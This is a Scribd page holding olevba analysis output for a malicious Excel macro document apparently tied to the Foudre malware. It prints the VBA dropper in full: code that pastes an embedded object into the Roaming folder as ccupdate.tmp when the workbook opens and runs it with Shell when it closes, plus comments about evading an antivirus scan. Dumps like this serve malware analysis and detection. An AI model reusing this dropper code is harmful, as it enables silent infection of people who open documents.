Scribd
Upload
40 views7 pages

.Maybe Foudre - Xls.mal

Uploaded by

Tomer Bar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
40 views7 pages

.Maybe Foudre - Xls.mal

Uploaded by

Tomer Bar
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

olevba 0.55.1 on Python 2.7.16 - http://decalage.

info/python/oletools
===============================================================================
FILE: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al
Type: OLE
-------------------------------------------------------------------------------
VBA MACRO ThisWorkbook.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/ThisWorkbook'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Public fpath As String

'does not work correctly


Public Function WinNtVersion()
Dim objWMI As Object
Dim objSystems As Object
Dim objOs As Object

Set objWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\


cimv2")
Set objSystems = objWMI.ExecQuery("Select * from Win32_OperatingSystem")

For Each objOs In objSystems


'MsgBox "O/S Name : " & objOs.Caption & " / " & objOs.Version
WinNtVersion = objOs.Version
Next

Set objOs = Nothing


Set objSystems = Nothing
Set objWMI = Nothing

End Function

Private Sub Workbook_Open()


On Error GoTo Er3:

SaveExeFile

If InStr(System.OperatingSystem, "Windows") <> 0 Then


' ContentMode
Else
MsgBox "Please open this document in Windows Operating System"
End If

If WinNtVersion < 2 Then 'bypass


MsgBox "helooo"
End If

Er3:
End Sub

Function IsFile(ByVal fName As String) As Boolean


'Returns TRUE if the provided name points to an existing file.
'Returns FALSE if not existing, or if it's a folder
On Error Resume Next
IsFile = ((GetAttr(fName) And vbDirectory) <> vbDirectory)
End Function

'after each update rename tmp file


'Used names
'euupdate.tmp
'EZUpdate.tmp
'cqupdate.tmp
Sub SaveExeFile()

On Error Resume Next

stpath = Replace(Environ("temp"), "Local\Temp", "Roaming")

Kill (stpath) + "\ccupdate.tmp"

'Sheets("Sheet1").OLEObjects("Object 1").Copy
Sheets("Sheet1").OLEObjects(1).Copy

waitTill = Now() + TimeValue("00:00:03")


While Now() < waitTill
DoEvents
Wend

CreateObject("Shell.Application").Namespace(stpath).Self.InvokeVerb "Paste"

' fpath$ = stpath + "\ccupdate.tmp"

End Sub

Private Sub Workbook_BeforeClose(Cancel As Boolean)


On Error GoTo Er4:

stpath = Replace(Environ("temp"), "Local\Temp", "Roaming")


fpath$ = stpath + "\ccupdate.tmp"

Shell fpath$

'prevent warning empty clipboard


ClearClipboard

Cancel = False

Er4:
Saved = True
End Sub

Sub ClearClipboard()
Dim MyData As DataObject
Set MyData = New DataObject
MyData.SetText ""
MyData.PutInClipboard
End Sub

' bypass Avira manuall Scan

Sub Dec()

Dim sKey As String


Dim payload As String
Dim Value As String

sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("

Value = XorC(payload, sKey)


MsgBox Value

End Sub

Sub Dec1()

Dim sKey As String


Dim payload As String
Dim Value As String

sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("

Value = XorC(payload, sKey)


MsgBox Value

End Sub

Sub Dec2()

Dim sKey As String


Dim payload As String
Dim Value As String

sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("

Value = XorC(payload, sKey)


MsgBox Value

End Sub

Sub Dec3()

Dim sKey As String


Dim payload As String
Dim Value As String

sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("

Value = XorC(payload, sKey)


MsgBox Value

End Sub

Sub Dec4()

Dim sKey As String


Dim payload As String
Dim Value As String

sKey = "KALLOBANK"
payload = "xxx$69=vno€}zp}btraze6*@<m&#("

Value = XorC(payload, sKey)


MsgBox Value

End Sub

Sub GetValue()

Dim name As String


name = Application.InputBox("Please enter your name")

MsgBox "your name is: " + name

End Sub

Sub GetValue2()

MsgBox "1111111"

End Sub

-------------------------------------------------------------------------------
VBA MACRO Sheet1.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Sheet1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Sheet2.cls
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Sheet2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)
-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: C:\Users\Tomer Bar\Downloads\
76bcb041d17441d1fdb0223abfb4a1564078117fad4c1caeafc0ed930d13167c.maybe_foudre.xls.m
al - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

'************************************************************************
' Full VBA Course: https://www.teachexcel.com/vba-course-update.php
'************************************************************************

' Excel VBA Tutorial - https://www.TeachExcel.com


'
' Hide Worksheets Using a Password
'
' Specific Sheets will not be visible until the user enters the correct password.
'
' If you don't password protect the project, the user can still unhide the
' worksheet.
'
' Password Protect the Project: Right-click the Project in the Project Explorer >
' VBAProject Properties > Protection tab > check Lock project for viewing and
' input a password and hit OK.

Option Explicit ' Require that variables are declared.

' The Password


' A global constant value allows you to store this password once for your entire
' project and use it wherever you need to check for the password. This ensures
' that you only have to change the password in one place in the future.
Public Const conSheetPassword As String = "abcxyz456"

Sub ViewSheet()
' Code from: https://www.TeachExcel.com
'
' Unlock/show the worksheet if the user inputs the correct password.

' Variables.
Dim userInput As Variant

' Ask the user for the password to unlock the sheet.
userInput = InputBox( _
Prompt:="Input the password to unlock the worksheets.", _
Title:="Password Input", _
Default:="Password")

' Check if the correct password was input.


' - Trim() removes any space that might have been accidentally added to the
' start or end of the password.
' - LCase() ensures that a case-insensitive check is being performed because
' it converts the input and the password both to lower case.
If LCase(Trim(userInput)) = LCase(conSheetPassword) Then
' Pass - all is good.

' Show the Sheet.


'Sheets("Helper").Visible = xlSheetVisible
Sheets("Raw").Visible = xlSheetVisible

' Go to the sheet.


Sheets("Raw").Select

Else
' Fail - wrong password.

' Let the user know.


MsgBox "Incorrect password. Access Denied."

End If

End Sub
Sub HideSheet()
' Code from: https://www.TeachExcel.com
'
' Hide the worksheet so that the user cannot unhide it by hand.
'
' If you don't password protect the project, the user can still unhide the
' worksheet.
'
' Password Protect the Project: Right-click the Project in the Project Explorer >
' VBAProject Properties > Protection tab > check Lock project for viewing and
' input a password and hit OK.

' Hide the sheet so the user can't unhide it by hand (so long as the Project
' code here is also password protected).
'Sheets("Helper").Visible = xlSheetVeryHidden
Sheets("Raw").Visible = xlSheetVeryHidden

End Sub

+----------+--------------------+---------------------------------------------+
|Type |Keyword |Description |
+----------+--------------------+---------------------------------------------+
|AutoExec |Workbook_Open |Runs when the Excel Workbook is opened |
|Suspicious|Kill |May delete a file |
|Suspicious|Shell.Application |May run an application (if combined with |
| | |CreateObject) |
|Suspicious|CreateObject |May create an OLE object |
|Suspicious|Environ |May read system environment variables |
|Suspicious|Shell |May run an executable file or a system |
| | |command |
|Suspicious|open |May open a file |
|Suspicious|Windows |May enumerate application windows (if |
| | |combined with Shell.Application object) |
|Suspicious|System |May run an executable file or a system |
| | |command on a Mac (if combined with |
| | |libc.dylib) |
|Suspicious|Hex Strings |Hex-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|Suspicious|Base64 Strings |Base64-encoded strings were detected, may be |
| | |used to obfuscate strings (option --decode to|
| | |see all) |
|IOC |https://www.teachexc|URL |
| |el.com/vba-course- | |
| |update.php | |
|IOC |https://www.TeachExc|URL |
| |el.com | |
+----------+--------------------+---------------------------------------------+

You might also like